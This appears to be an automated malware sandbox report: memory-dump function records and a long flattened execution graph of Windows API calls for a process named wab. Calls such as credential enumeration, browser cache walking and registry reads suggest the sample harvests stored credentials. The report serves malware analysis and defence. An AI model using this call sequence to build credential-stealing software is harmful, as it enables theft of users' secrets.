                  • LoadLibraryExW.KERNEL32(00000000,00000000,00000000,?,240C5C88,240C1D66,00000000,00000000,00000000,?,240C5E85,00000006,FlsSetValue,240CE190,FlsSetValue,00000000), ref: 240C5D2D
                  Memory Dump Source
                  • Source File: 00000008.00000002.3287085211.00000000240C1000.00000040.00001000.00020000.00000000.sdmp, Offset: 240C0000, based on PE: true
                  • Associated: 00000008.00000002.3287068428.00000000240C0000.00000004.00001000.00020000.00000000.sdmp
                  • Associated: 00000008.00000002.3287085211.00000000240D6000.00000040.00001000.00020000.00000000.sdmp
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_8_2_240c0000_wab.jbxd
                  Similarity
                  • API ID: LibraryLoad$ErrorLast
                  • String ID:
                  • API String ID: 3177248105-0
                  • Opcode ID: 8b3724333a434cfa9f4fedb45b0b2582d053f35d6ed7335bfe2121735478d7da
                  • Instruction ID: 9a98a4ac64e2c997ecec0fcc30cbdcf4b55ccd52e2d58db6237b53c208b1dd35
                  • Opcode Fuzzy Hash: 8b3724333a434cfa9f4fedb45b0b2582d053f35d6ed7335bfe2121735478d7da
                  • Instruction Fuzzy Hash: 2E01843A711332EBC7214E68DC48F4E7B99EF456A1B610630FA0AE7181D734D981CAE0
                  APIs
                  • _free.LIBCMT ref: 240C655C
                    • Part of subcall function 240C62BC: IsProcessorFeaturePresent.KERNEL32(00000017,240C62AB,00000000,?,?,?,?,00000016,?,?,240C62B8,00000000,00000000,00000000,00000000,00000000), ref: 240C62BE
                    • Part of subcall function 240C62BC: GetCurrentProcess.KERNEL32(C0000417), ref: 240C62E0
                    • Part of subcall function 240C62BC: TerminateProcess.KERNEL32(00000000), ref: 240C62E7
                  Strings
                  Memory Dump Source
                  • Source File: 00000008.00000002.3287085211.00000000240C1000.00000040.00001000.00020000.00000000.sdmp, Offset: 240C0000, based on PE: true
                  • Associated: 00000008.00000002.3287068428.00000000240C0000.00000004.00001000.00020000.00000000.sdmp
                  • Associated: 00000008.00000002.3287085211.00000000240D6000.00000040.00001000.00020000.00000000.sdmp
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_8_2_240c0000_wab.jbxd
                  Similarity
                  • API ID: Process$CurrentFeaturePresentProcessorTerminate_free
                  • String ID: *?$.
                  • API String ID: 2667617558-3972193922
                  • Opcode ID: 45d8a64586b327f8eab7ad145b3c87db09c0e9126064bd79fff12b51639589bd
                  • Instruction ID: fcd57e1b259bfe93c4e09c93ea6fd82b39b4f6f5dc3388f129c1da7a53bc5d51
                  • Opcode Fuzzy Hash: 45d8a64586b327f8eab7ad145b3c87db09c0e9126064bd79fff12b51639589bd
                  • Instruction Fuzzy Hash: FB51E171E00209EFDB25CFE8C880AADBBF5FF58714F248569D804E7304E6359A818B50
                  APIs
                  Strings
                  Memory Dump Source
                  • Source File: 00000008.00000002.3287085211.00000000240C1000.00000040.00001000.00020000.00000000.sdmp, Offset: 240C0000, based on PE: true
                  • Associated: 00000008.00000002.3287068428.00000000240C0000.00000004.00001000.00020000.00000000.sdmp
                  • Associated: 00000008.00000002.3287085211.00000000240D6000.00000040.00001000.00020000.00000000.sdmp
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_8_2_240c0000_wab.jbxd
                  Similarity
                  • API ID: _strlen
                  • String ID: : $Se.
                  • API String ID: 4218353326-4089948878
                  • Opcode ID: a70abbbd33418fa47f4ed48ac4096c545584c77cf093be3414735b4e2c88b945
                  • Instruction ID: bfc86eced29e8628a51e174fa075f2ce43330f8599d9266a38337becf41319d3
                  • Opcode Fuzzy Hash: a70abbbd33418fa47f4ed48ac4096c545584c77cf093be3414735b4e2c88b945
                  • Instruction Fuzzy Hash: E8110671900248EFDB11DFA8D840BDEFBFCEF29208F60405AE545EB252E6705B42CB65
                  APIs
                  • __CxxThrowException@8.LIBVCRUNTIME ref: 240C2903
                    • Part of subcall function 240C35D2: RaiseException.KERNEL32(?,?,?,240C2925,00000000,00000000,00000000,?,?,?,?,?,240C2925,?,240D21B8), ref: 240C3632
                  • __CxxThrowException@8.LIBVCRUNTIME ref: 240C2920
                  Strings
                  Memory Dump Source
                  • Source File: 00000008.00000002.3287085211.00000000240C1000.00000040.00001000.00020000.00000000.sdmp, Offset: 240C0000, based on PE: true
                  • Associated: 00000008.00000002.3287068428.00000000240C0000.00000004.00001000.00020000.00000000.sdmp
                  • Associated: 00000008.00000002.3287085211.00000000240D6000.00000040.00001000.00020000.00000000.sdmp
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_8_2_240c0000_wab.jbxd
                  Similarity
                  • API ID: Exception@8Throw$ExceptionRaise
                  • String ID: Unknown exception
                  • API String ID: 3476068407-410509341
                  • Opcode ID: 3ef76b1e60837c693b61fe5ec87ecf922e167124c41d70449251064bfd1efb22
                  • Instruction ID: 30fb841d63171670eef017bce35496b84399cf867226b598aba76b7bff503647
                  • Opcode Fuzzy Hash: 3ef76b1e60837c693b61fe5ec87ecf922e167124c41d70449251064bfd1efb22
                  • Instruction Fuzzy Hash: B5F0F434E0030CF79B00E6A5EC44E5D77ACAF2CA54B508578EE149A894EB70EAD98581
                  APIs
                    • Part of subcall function 240C5AF6: GetLastError.KERNEL32(?,?,240C6C6C), ref: 240C5AFA
                    • Part of subcall function 240C5AF6: _free.LIBCMT ref: 240C5B2D
                    • Part of subcall function 240C5AF6: SetLastError.KERNEL32(00000000,?,?,240C6C6C), ref: 240C5B6E
                    • Part of subcall function 240C5AF6: _abort.LIBCMT ref: 240C5B74
                  • _abort.LIBCMT ref: 240C6DB0
                  • _free.LIBCMT ref: 240C6DE4
                  Strings
                  Memory Dump Source
                  • Source File: 00000008.00000002.3287085211.00000000240C1000.00000040.00001000.00020000.00000000.sdmp, Offset: 240C0000, based on PE: true
                  • Associated: 00000008.00000002.3287068428.00000000240C0000.00000004.00001000.00020000.00000000.sdmp
                  • Associated: 00000008.00000002.3287085211.00000000240D6000.00000040.00001000.00020000.00000000.sdmp
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_8_2_240c0000_wab.jbxd
                  Similarity
                  • API ID: ErrorLast_abort_free
                  • String ID: `=&$
                  • API String ID: 289325740-3373021481
                  • Opcode ID: 95e9d2ac9842a6657695f58281e182621c3764762ca6965857b7f7310f8c341b
                  • Instruction ID: c0ee9724e44c059f7d2a15e9f0982cf555ee3eff2cc2b1bbfa5dc04b9910daa6
                  • Opcode Fuzzy Hash: 95e9d2ac9842a6657695f58281e182621c3764762ca6965857b7f7310f8c341b
                  • Instruction Fuzzy Hash: D1019275D11632DBC7219FA8C44065DB7A1FF18F24B15066AE910A7288CB7569C28FC5

                  Execution Graph

                  Execution Coverage:6.4%
                  Dynamic/Decrypted Code Coverage:9.2%
                  Signature Coverage:1.5%
                  Total number of Nodes:2000
                  Total number of Limit Nodes:84
                  execution_graph 40406 441819 40409 430737 40406->40409 40408 441825 40410 430756 40409->40410 40422 43076d 40409->40422 40411 430774 40410->40411 40412 43075f 40410->40412 40423 43034a 40411->40423 40434 4169a7 11 API calls 40412->40434 40415 4307ce 40416 430819 memset 40415->40416 40427 415b2c 40415->40427 40416->40422 40417 43077e 40417->40415 40420 4307fa 40417->40420 40417->40422 40419 4307e9 40419->40416 40419->40422 40435 4169a7 11 API calls 40420->40435 40422->40408 40424 430359 40423->40424 40425 43034e 40423->40425 40424->40417 40436 415c23 memcpy 40425->40436 40428 415b42 40427->40428 40433 415b46 40427->40433 40429 415b94 40428->40429 40431 415b5a 40428->40431 40428->40433 40430 4438b5 10 API calls 40429->40430 40430->40433 40432 415b79 memcpy 40431->40432 40431->40433 40432->40433 40433->40419 40434->40422 40435->40422 40436->40424 37677 442ec6 19 API calls 37854 4152c6 malloc 37855 4152e2 37854->37855 37856 4152ef 37854->37856 37858 416760 11 API calls 37856->37858 37858->37855 37859 4466f4 37878 446904 37859->37878 37861 446700 GetModuleHandleA 37864 446710 __set_app_type __p__fmode __p__commode 37861->37864 37863 4467a4 37865 4467ac __setusermatherr 37863->37865 37866 4467b8 37863->37866 37864->37863 37865->37866 37879 4468f0 _controlfp 37866->37879 37868 4467bd _initterm __wgetmainargs _initterm 37869 44681e GetStartupInfoW 37868->37869 37870 446810 37868->37870 37872 446866 GetModuleHandleA 37869->37872 37880 41276d 37872->37880 37876 446896 exit 37877 44689d _cexit 37876->37877 37877->37870 37878->37861 37879->37868 37881 41277d 37880->37881 37923 4044a4 LoadLibraryW 37881->37923 37883 412785 37915 412789 37883->37915 37931 414b81 37883->37931 37886 4127c8 37937 412465 memset ??2@YAPAXI 37886->37937 37888 4127ea 37949 40ac21 37888->37949 37893 412813 37967 40dd07 memset 37893->37967 37894 412827 37972 40db69 memset 37894->37972 37897 412822 37993 4125b6 ??3@YAXPAX 37897->37993 37899 40ada2 _wcsicmp 37900 41283d 37899->37900 
37900->37897 37903 412863 CoInitialize 37900->37903 37977 41268e 37900->37977 37997 4123e2 GetModuleHandleW RegisterClassW GetModuleHandleW CreateWindowExW 37903->37997 37905 41296f 37999 40b633 37905->37999 37910 412873 ShowWindow UpdateWindow GetModuleHandleW LoadAcceleratorsW GetMessageW 37914 412957 37910->37914 37920 4128ca 37910->37920 37914->37897 37915->37876 37915->37877 37916 4128d0 TranslateAcceleratorW 37917 412941 GetMessageW 37916->37917 37916->37920 37917->37914 37917->37916 37918 412909 IsDialogMessageW 37918->37917 37918->37920 37919 4128fd IsDialogMessageW 37919->37917 37919->37918 37920->37916 37920->37918 37920->37919 37921 41292b TranslateMessage DispatchMessageW 37920->37921 37922 41291f IsDialogMessageW 37920->37922 37921->37917 37922->37917 37922->37921 37924 4044cf GetProcAddress 37923->37924 37927 4044f7 37923->37927 37925 4044e8 FreeLibrary 37924->37925 37928 4044df 37924->37928 37926 4044f3 37925->37926 37925->37927 37926->37927 37929 404507 MessageBoxW 37927->37929 37930 40451e 37927->37930 37928->37925 37929->37883 37930->37883 37932 414b8a 37931->37932 37933 412794 SetErrorMode GetModuleHandleW EnumResourceTypesW 37931->37933 38003 40a804 memset 37932->38003 37933->37886 37936 414b9e GetProcAddress 37936->37933 37938 4124e0 37937->37938 37939 412505 ??2@YAPAXI 37938->37939 37940 41251c 37939->37940 37942 412521 37939->37942 38025 40e820 memset ??2@YAPAXI ??2@YAPAXI ??2@YAPAXI ??2@YAPAXI 37940->38025 38014 444722 37942->38014 37948 41259b wcscpy 37948->37888 38030 40b1ab ??3@YAXPAX ??3@YAXPAX 37949->38030 37953 40ad4b 37962 40ad76 37953->37962 38054 40a9ce 37953->38054 37954 40a9ce malloc memcpy ??3@YAXPAX ??3@YAXPAX 37956 40ac5c 37954->37956 37956->37953 37956->37954 37957 40ace7 ??3@YAXPAX 37956->37957 37956->37962 38034 40a8d0 37956->38034 38046 4099f4 37956->38046 37957->37956 37961 40a8d0 7 API calls 37961->37962 38031 40aa04 37962->38031 37963 40ada2 37964 40adc9 37963->37964 37965 40adaa 37963->37965 37964->37893 37964->37894 
37965->37964 37966 40adb3 _wcsicmp 37965->37966 37966->37964 37966->37965 38059 40dce0 37967->38059 37969 40dd3a GetModuleHandleW 38064 40dba7 37969->38064 37973 40dce0 3 API calls 37972->37973 37974 40db99 37973->37974 38136 40dae1 37974->38136 38150 402f3a 37977->38150 37979 412766 37979->37897 37979->37903 37980 4126d3 _wcsicmp 37981 4126a8 37980->37981 37981->37979 37981->37980 37983 41270a 37981->37983 38184 4125f8 7 API calls 37981->38184 37983->37979 38153 411ac5 37983->38153 37994 4125da 37993->37994 37995 4125f0 37994->37995 37996 4125e6 DeleteObject 37994->37996 37998 40b1ab ??3@YAXPAX ??3@YAXPAX 37995->37998 37996->37995 37997->37910 37998->37905 38000 40b640 37999->38000 38001 40b639 ??3@YAXPAX 37999->38001 38002 40b1ab ??3@YAXPAX ??3@YAXPAX 38000->38002 38001->38000 38002->37915 38004 40a83b GetSystemDirectoryW 38003->38004 38005 40a84c wcscpy 38003->38005 38004->38005 38010 409719 wcslen 38005->38010 38008 40a881 LoadLibraryW 38009 40a886 38008->38009 38009->37933 38009->37936 38011 409724 38010->38011 38012 409739 wcscat LoadLibraryW 38010->38012 38011->38012 38013 40972c wcscat 38011->38013 38012->38008 38012->38009 38013->38012 38015 444732 38014->38015 38016 444728 DeleteObject 38014->38016 38026 409cc3 38015->38026 38016->38015 38018 412551 38019 4010f9 38018->38019 38020 401130 38019->38020 38021 401134 GetModuleHandleW LoadIconW 38020->38021 38022 401107 wcsncat 38020->38022 38023 40a7be 38021->38023 38022->38020 38024 40a7d2 38023->38024 38024->37948 38024->38024 38025->37942 38029 409bfd memset wcscpy 38026->38029 38028 409cdb CreateFontIndirectW 38028->38018 38029->38028 38030->37956 38032 40aa14 38031->38032 38033 40aa0a ??3@YAXPAX 38031->38033 38032->37963 38033->38032 38035 40a8eb 38034->38035 38036 40a8df wcslen 38034->38036 38037 40a906 ??3@YAXPAX 38035->38037 38038 40a90f 38035->38038 38036->38035 38042 40a919 38037->38042 38039 4099f4 3 API calls 38038->38039 38039->38042 38040 40a932 38044 4099f4 3 API calls 38040->38044 38041 40a929 
??3@YAXPAX 38043 40a93e memcpy 38041->38043 38042->38040 38042->38041 38043->37956 38045 40a93d 38044->38045 38045->38043 38047 409a41 38046->38047 38048 4099fb malloc 38046->38048 38047->37956 38050 409a37 38048->38050 38051 409a1c 38048->38051 38050->37956 38052 409a30 ??3@YAXPAX 38051->38052 38053 409a20 memcpy 38051->38053 38052->38050 38053->38052 38055 40a9e7 38054->38055 38056 40a9dc ??3@YAXPAX 38054->38056 38058 4099f4 3 API calls 38055->38058 38057 40a9f2 38056->38057 38057->37961 38058->38057 38083 409bca GetModuleFileNameW 38059->38083 38061 40dce6 wcsrchr 38062 40dcf5 38061->38062 38063 40dcf9 wcscat 38061->38063 38062->38063 38063->37969 38084 44db70 38064->38084 38068 40dbfd 38087 4447d9 38068->38087 38071 40dc34 wcscpy wcscpy 38113 40d6f5 38071->38113 38072 40dc1f wcscpy 38072->38071 38075 40d6f5 3 API calls 38076 40dc73 38075->38076 38077 40d6f5 3 API calls 38076->38077 38078 40dc89 38077->38078 38079 40d6f5 3 API calls 38078->38079 38080 40dc9c EnumResourceNamesW EnumResourceNamesW wcscpy 38079->38080 38119 40da80 38080->38119 38083->38061 38085 40dbb4 memset memset 38084->38085 38086 409bca GetModuleFileNameW 38085->38086 38086->38068 38089 4447f4 38087->38089 38088 40dc1b 38088->38071 38088->38072 38089->38088 38090 444807 ??2@YAPAXI 38089->38090 38091 44481f 38090->38091 38092 444873 _snwprintf 38091->38092 38093 4448ab wcscpy 38091->38093 38126 44474a 8 API calls 38092->38126 38095 4448bb 38093->38095 38127 44474a 8 API calls 38095->38127 38097 4448a7 38097->38093 38097->38095 38098 4448cd 38128 44474a 8 API calls 38098->38128 38100 4448e2 38129 44474a 8 API calls 38100->38129 38102 4448f7 38130 44474a 8 API calls 38102->38130 38104 44490c 38131 44474a 8 API calls 38104->38131 38106 444921 38132 44474a 8 API calls 38106->38132 38108 444936 38133 44474a 8 API calls 38108->38133 38110 44494b 38134 44474a 8 API calls 38110->38134 38112 444960 ??3@YAXPAX 38112->38088 38114 44db70 38113->38114 38115 40d702 memset GetPrivateProfileStringW 
38114->38115 38116 40d752 38115->38116 38117 40d75c WritePrivateProfileStringW 38115->38117 38116->38117 38118 40d758 38116->38118 38117->38118 38118->38075 38120 44db70 38119->38120 38121 40da8d memset 38120->38121 38122 40daac LoadStringW 38121->38122 38123 40dac6 38122->38123 38123->38122 38125 40dade 38123->38125 38135 40d76e memset GetPrivateProfileStringW WritePrivateProfileStringW memset _itow 38123->38135 38125->37897 38126->38097 38127->38098 38128->38100 38129->38102 38130->38104 38131->38106 38132->38108 38133->38110 38134->38112 38135->38123 38146 409b98 GetFileAttributesW 38136->38146 38138 40daea 38139 40db63 38138->38139 38140 40daef wcscpy wcscpy GetPrivateProfileIntW 38138->38140 38139->37899 38147 40d65d GetPrivateProfileStringW 38140->38147 38142 40db3e 38148 40d65d GetPrivateProfileStringW 38142->38148 38144 40db4f 38149 40d65d GetPrivateProfileStringW 38144->38149 38146->38138 38147->38142 38148->38144 38149->38139 38185 40eaff 38150->38185 38154 411ae2 memset 38153->38154 38155 411b8f 38153->38155 38225 409bca GetModuleFileNameW 38154->38225 38167 411a8b 38155->38167 38157 411b0a wcsrchr 38158 411b22 wcscat 38157->38158 38159 411b1f 38157->38159 38226 414770 wcscpy wcscpy wcscpy CreateFileW CloseHandle 38158->38226 38159->38158 38161 411b67 38227 402afb 38161->38227 38165 411b7f 38283 40ea13 SendMessageW memset SendMessageW 38165->38283 38168 402afb 27 API calls 38167->38168 38169 411ac0 38168->38169 38170 4110dc 38169->38170 38171 41113e 38170->38171 38176 4110f0 38170->38176 38308 40969c LoadCursorW SetCursor 38171->38308 38173 411143 38309 4032b4 38173->38309 38327 444a54 38173->38327 38174 4110f7 _wcsicmp 38174->38176 38175 411157 38177 40ada2 _wcsicmp 38175->38177 38176->38171 38176->38174 38330 410c46 10 API calls 38176->38330 38180 411167 38177->38180 38178 4111af 38180->38178 38181 4111a6 qsort 38180->38181 38181->38178 38184->37981 38186 40eb10 38185->38186 38198 40e8e0 38186->38198 38189 40eb6c memcpy memcpy 38190 40ebb7 38189->38190 
38190->38189 38191 40ebf2 ??2@YAPAXI ??2@YAPAXI 38190->38191 38192 40d134 16 API calls 38190->38192 38193 40ec2e ??2@YAPAXI 38191->38193 38195 40ec65 38191->38195 38192->38190 38193->38195 38195->38195 38208 40ea7f 38195->38208 38197 402f49 38197->37981 38199 40e8f2 38198->38199 38200 40e8eb ??3@YAXPAX 38198->38200 38201 40e900 38199->38201 38202 40e8f9 ??3@YAXPAX 38199->38202 38200->38199 38203 40e911 38201->38203 38204 40e90a ??3@YAXPAX 38201->38204 38202->38201 38205 40e931 ??2@YAPAXI ??2@YAPAXI 38203->38205 38206 40e921 ??3@YAXPAX 38203->38206 38207 40e92a ??3@YAXPAX 38203->38207 38204->38203 38205->38189 38206->38207 38207->38205 38209 40aa04 ??3@YAXPAX 38208->38209 38210 40ea88 38209->38210 38211 40aa04 ??3@YAXPAX 38210->38211 38212 40ea90 38211->38212 38213 40aa04 ??3@YAXPAX 38212->38213 38214 40ea98 38213->38214 38215 40aa04 ??3@YAXPAX 38214->38215 38216 40eaa0 38215->38216 38217 40a9ce 4 API calls 38216->38217 38218 40eab3 38217->38218 38219 40a9ce 4 API calls 38218->38219 38220 40eabd 38219->38220 38221 40a9ce 4 API calls 38220->38221 38222 40eac7 38221->38222 38223 40a9ce 4 API calls 38222->38223 38224 40ead1 38223->38224 38224->38197 38225->38157 38226->38161 38284 40b2cc 38227->38284 38229 402b0a 38230 40b2cc 27 API calls 38229->38230 38231 402b23 38230->38231 38232 40b2cc 27 API calls 38231->38232 38233 402b3a 38232->38233 38234 40b2cc 27 API calls 38233->38234 38235 402b54 38234->38235 38236 40b2cc 27 API calls 38235->38236 38237 402b6b 38236->38237 38238 40b2cc 27 API calls 38237->38238 38239 402b82 38238->38239 38240 40b2cc 27 API calls 38239->38240 38241 402b99 38240->38241 38242 40b2cc 27 API calls 38241->38242 38243 402bb0 38242->38243 38244 40b2cc 27 API calls 38243->38244 38245 402bc7 38244->38245 38246 40b2cc 27 API calls 38245->38246 38247 402bde 38246->38247 38248 40b2cc 27 API calls 38247->38248 38249 402bf5 38248->38249 38250 40b2cc 27 API calls 38249->38250 38251 402c0c 38250->38251 38252 40b2cc 27 API calls 38251->38252 38253 402c23 
38252->38253 38254 40b2cc 27 API calls 38253->38254 38255 402c3a 38254->38255 38256 40b2cc 27 API calls 38255->38256 38257 402c51 38256->38257 38258 40b2cc 27 API calls 38257->38258 38259 402c68 38258->38259 38260 40b2cc 27 API calls 38259->38260 38261 402c7f 38260->38261 38262 40b2cc 27 API calls 38261->38262 38263 402c99 38262->38263 38264 40b2cc 27 API calls 38263->38264 38265 402cb3 38264->38265 38266 40b2cc 27 API calls 38265->38266 38267 402cd5 38266->38267 38268 40b2cc 27 API calls 38267->38268 38269 402cf0 38268->38269 38270 40b2cc 27 API calls 38269->38270 38271 402d0b 38270->38271 38272 40b2cc 27 API calls 38271->38272 38273 402d26 38272->38273 38274 40b2cc 27 API calls 38273->38274 38275 402d3e 38274->38275 38276 40b2cc 27 API calls 38275->38276 38277 402d59 38276->38277 38278 40b2cc 27 API calls 38277->38278 38279 402d78 38278->38279 38280 40b2cc 27 API calls 38279->38280 38281 402d93 38280->38281 38282 4018db GetWindowPlacement memset GetSystemMetrics GetSystemMetrics SetWindowPlacement 38281->38282 38282->38165 38283->38155 38287 40b58d 38284->38287 38286 40b2d1 38286->38229 38288 40b5a4 GetModuleHandleW FindResourceW 38287->38288 38289 40b62e 38287->38289 38290 40b5c2 LoadResource 38288->38290 38291 40b5e7 38288->38291 38289->38286 38290->38291 38292 40b5d0 SizeofResource LockResource 38290->38292 38291->38289 38300 40afcf 38291->38300 38292->38291 38294 40b608 memcpy 38303 40b4d3 memcpy 38294->38303 38296 40b61e 38304 40b3c1 18 API calls 38296->38304 38298 40b626 38305 40b04b 38298->38305 38301 40b04b ??3@YAXPAX 38300->38301 38302 40afd7 ??2@YAPAXI 38301->38302 38302->38294 38303->38296 38304->38298 38306 40b051 ??3@YAXPAX 38305->38306 38307 40b05f 38305->38307 38306->38307 38307->38289 38308->38173 38310 4032c4 38309->38310 38311 40b633 ??3@YAXPAX 38310->38311 38312 403316 38311->38312 38331 44553b 38312->38331 38316 403480 38527 40368c 15 API calls 38316->38527 38318 403489 38319 40b633 ??3@YAXPAX 38318->38319 38320 403495 38319->38320 
38320->38175 38321 4033a9 memset memcpy 38322 4033ec wcscmp 38321->38322 38323 40333c 38321->38323 38322->38323 38323->38316 38323->38321 38323->38322 38525 4028e7 11 API calls 38323->38525 38526 40f508 6 API calls 38323->38526 38325 403421 _wcsicmp 38325->38323 38328 444a64 FreeLibrary 38327->38328 38329 444a83 38327->38329 38328->38329 38329->38175 38330->38176 38332 445548 38331->38332 38333 445599 38332->38333 38528 40c768 38332->38528 38334 4455a8 memset 38333->38334 38340 4457f2 38333->38340 38611 403988 38334->38611 38343 445854 38340->38343 38713 403e2d memset memset memset memset memset 38340->38713 38394 4458aa 38343->38394 38736 403c9c memset memset memset memset memset 38343->38736 38344 445672 38622 403fbe memset memset memset memset memset 38344->38622 38345 4458bb memset memset 38347 414c2e 16 API calls 38345->38347 38346 4455e5 38346->38344 38356 44560f 38346->38356 38350 4458f9 38347->38350 38349 44595e memset memset 38354 414c2e 16 API calls 38349->38354 38355 40b2cc 27 API calls 38350->38355 38352 445a00 memset memset 38759 414c2e 38352->38759 38353 445b22 38359 445bca 38353->38359 38360 445b38 memset memset memset 38353->38360 38364 44599c 38354->38364 38365 445909 38355->38365 38367 4087b3 338 API calls 38356->38367 38357 44557a 38391 44558c 38357->38391 38808 41366b FreeLibrary 38357->38808 38358 445849 38823 40b1ab ??3@YAXPAX ??3@YAXPAX 38358->38823 38366 445c8b memset memset 38359->38366 38433 445cf0 38359->38433 38369 445bd4 38360->38369 38370 445b98 38360->38370 38373 40b2cc 27 API calls 38364->38373 38375 409d1f 6 API calls 38365->38375 38378 414c2e 16 API calls 38366->38378 38376 445621 38367->38376 38368 44589f 38824 40b1ab ??3@YAXPAX ??3@YAXPAX 38368->38824 38384 414c2e 16 API calls 38369->38384 38370->38369 38380 445ba2 38370->38380 38377 4459ac 38373->38377 38374 403335 38524 4452e5 45 API calls 38374->38524 38387 445919 38375->38387 38809 4454bf 20 API calls 38376->38809 38389 409d1f 6 API calls 38377->38389 38390 445cc9 
38378->38390 38896 4099c6 wcslen 38380->38896 38381 4456b2 38811 40b1ab ??3@YAXPAX ??3@YAXPAX 38381->38811 38383 40b2cc 27 API calls 38395 445a4f 38383->38395 38397 445be2 38384->38397 38385 445d3d 38418 40b2cc 27 API calls 38385->38418 38386 445d88 memset memset memset 38401 414c2e 16 API calls 38386->38401 38825 409b98 GetFileAttributesW 38387->38825 38388 445823 38388->38358 38400 4087b3 338 API calls 38388->38400 38402 4459bc 38389->38402 38403 409d1f 6 API calls 38390->38403 38595 444b06 38391->38595 38392 445879 38392->38368 38413 4087b3 338 API calls 38392->38413 38394->38345 38419 44594a 38394->38419 38774 409d1f wcslen wcslen 38395->38774 38398 40b2cc 27 API calls 38397->38398 38407 445bf3 38398->38407 38400->38388 38410 445dde 38401->38410 38892 409b98 GetFileAttributesW 38402->38892 38412 445ce1 38403->38412 38404 445bb3 38899 445403 memset 38404->38899 38405 445680 38405->38381 38645 4087b3 memset 38405->38645 38417 409d1f 6 API calls 38407->38417 38408 445928 38408->38419 38826 40b6ef 38408->38826 38420 40b2cc 27 API calls 38410->38420 38916 409b98 GetFileAttributesW 38412->38916 38413->38392 38416 40b2cc 27 API calls 38425 445a94 38416->38425 38427 445c07 38417->38427 38428 445d54 _wcsicmp 38418->38428 38419->38349 38432 4459ed 38419->38432 38431 445def 38420->38431 38421 4459cb 38421->38432 38441 40b6ef 252 API calls 38421->38441 38779 40ae18 38425->38779 38426 44566d 38426->38340 38696 413d4c 38426->38696 38437 445389 258 API calls 38427->38437 38438 445d71 38428->38438 38503 445d67 38428->38503 38430 445665 38810 40b1ab ??3@YAXPAX ??3@YAXPAX 38430->38810 38439 409d1f 6 API calls 38431->38439 38432->38352 38432->38353 38433->38374 38433->38385 38433->38386 38434 445389 258 API calls 38434->38359 38443 445c17 38437->38443 38917 445093 23 API calls 38438->38917 38446 445e03 38439->38446 38441->38432 38442 4456d8 38448 40b2cc 27 API calls 38442->38448 38449 40b2cc 27 API calls 38443->38449 38445 44563c 38445->38430 38451 4087b3 338 API calls 
38445->38451 38918 409b98 GetFileAttributesW 38446->38918 38447 40b6ef 252 API calls 38447->38374 38453 4456e2 38448->38453 38454 445c23 38449->38454 38450 445d83 38450->38374 38451->38445 38812 413fa6 _wcsicmp _wcsicmp 38453->38812 38458 409d1f 6 API calls 38454->38458 38456 445e12 38463 445e6b 38456->38463 38469 40b2cc 27 API calls 38456->38469 38461 445c37 38458->38461 38459 445aa1 38462 445b17 38459->38462 38477 445ab2 memset 38459->38477 38490 409d1f 6 API calls 38459->38490 38786 40add4 38459->38786 38791 445389 38459->38791 38800 40ae51 38459->38800 38460 4456eb 38465 4456fd memset memset memset memset 38460->38465 38466 4457ea 38460->38466 38467 445389 258 API calls 38461->38467 38893 40aebe 38462->38893 38920 445093 23 API calls 38463->38920 38813 409c70 wcscpy wcsrchr 38465->38813 38816 413d29 38466->38816 38473 445c47 38467->38473 38474 445e33 38469->38474 38471 445e7e 38476 445f67 38471->38476 38479 40b2cc 27 API calls 38473->38479 38480 409d1f 6 API calls 38474->38480 38485 40b2cc 27 API calls 38476->38485 38481 40b2cc 27 API calls 38477->38481 38483 445c53 38479->38483 38484 445e47 38480->38484 38481->38459 38482 409c70 2 API calls 38486 44577e 38482->38486 38487 409d1f 6 API calls 38483->38487 38919 409b98 GetFileAttributesW 38484->38919 38489 445f73 38485->38489 38491 409c70 2 API calls 38486->38491 38492 445c67 38487->38492 38494 409d1f 6 API calls 38489->38494 38490->38459 38495 44578d 38491->38495 38496 445389 258 API calls 38492->38496 38493 445e56 38493->38463 38499 445e83 memset 38493->38499 38497 445f87 38494->38497 38495->38466 38502 40b2cc 27 API calls 38495->38502 38496->38359 38923 409b98 GetFileAttributesW 38497->38923 38501 40b2cc 27 API calls 38499->38501 38504 445eab 38501->38504 38505 4457a8 38502->38505 38503->38374 38503->38447 38506 409d1f 6 API calls 38504->38506 38507 409d1f 6 API calls 38505->38507 38508 445ebf 38506->38508 38509 4457b8 38507->38509 38510 40ae18 9 API calls 38508->38510 38815 409b98 GetFileAttributesW 
[Flattened node and edge listing from the report's interactive function-graph widget; the raw graph is not reproduced here. Each node names a function at the listed code address and the Windows API calls made from it. API names visible in this part of the listing include CredEnumerateW, FindFirstUrlCacheEntryW / FindNextUrlCacheEntryW / FindCloseUrlCache, CreateToolhelp32Snapshot / Process32FirstW / Process32NextW / OpenProcess, K32GetModuleFileNameExW, GetProcessTimes, RegOpenKeyExW / RegQueryValueExW / RegEnumValueW / RegCloseKey, CreateFileMappingW / MapViewOfFile, GetTempPathW / GetTempFileNameW / CopyFileW / DeleteFileW, GetPrivateProfileStringW / WritePrivateProfileStringW, FindResourceW / LoadResource / LockResource, GetFileAttributesW, FindFirstFileW / FindNextFileW / FindClose, GetProcAddress / FreeLibrary, SystemTimeToFileTime / FileTimeToLocalFileTime, and GetVersionExW.]
40168->40010 40169->40005 40170->40013 40171->40015 40172->40025 40173->39966 40174->39912 40176 42a175 40175->40176 40178 42a122 40175->40178 40176->40089 40181 42b13b 147 API calls 40176->40181 40178->40176 40179 42a115 147 API calls 40178->40179 40182 43a174 40178->40182 40206 42a0a8 147 API calls 40178->40206 40179->40178 40181->40092 40196 43a196 40182->40196 40197 43a19e 40182->40197 40183 43a306 40183->40196 40226 4388c4 14 API calls 40183->40226 40186 42a115 147 API calls 40186->40197 40188 43a642 40188->40196 40230 4169a7 11 API calls 40188->40230 40192 43a635 40229 42c02e memset 40192->40229 40196->40178 40197->40183 40197->40186 40197->40196 40207 42ff8c 40197->40207 40215 415a91 40197->40215 40219 4165ff 40197->40219 40222 439504 13 API calls 40197->40222 40223 4312d0 147 API calls 40197->40223 40224 42be4c memcpy memcpy memcpy memset memcpy 40197->40224 40225 43a121 11 API calls 40197->40225 40199 4169a7 11 API calls 40200 43a325 40199->40200 40200->40188 40200->40192 40200->40196 40200->40199 40201 42b5b5 memset memcpy 40200->40201 40202 42bf4c 14 API calls 40200->40202 40205 4165ff 11 API calls 40200->40205 40227 42b63e 14 API calls 40200->40227 40228 42bfcf memcpy 40200->40228 40201->40200 40202->40200 40205->40200 40206->40178 40231 43817e 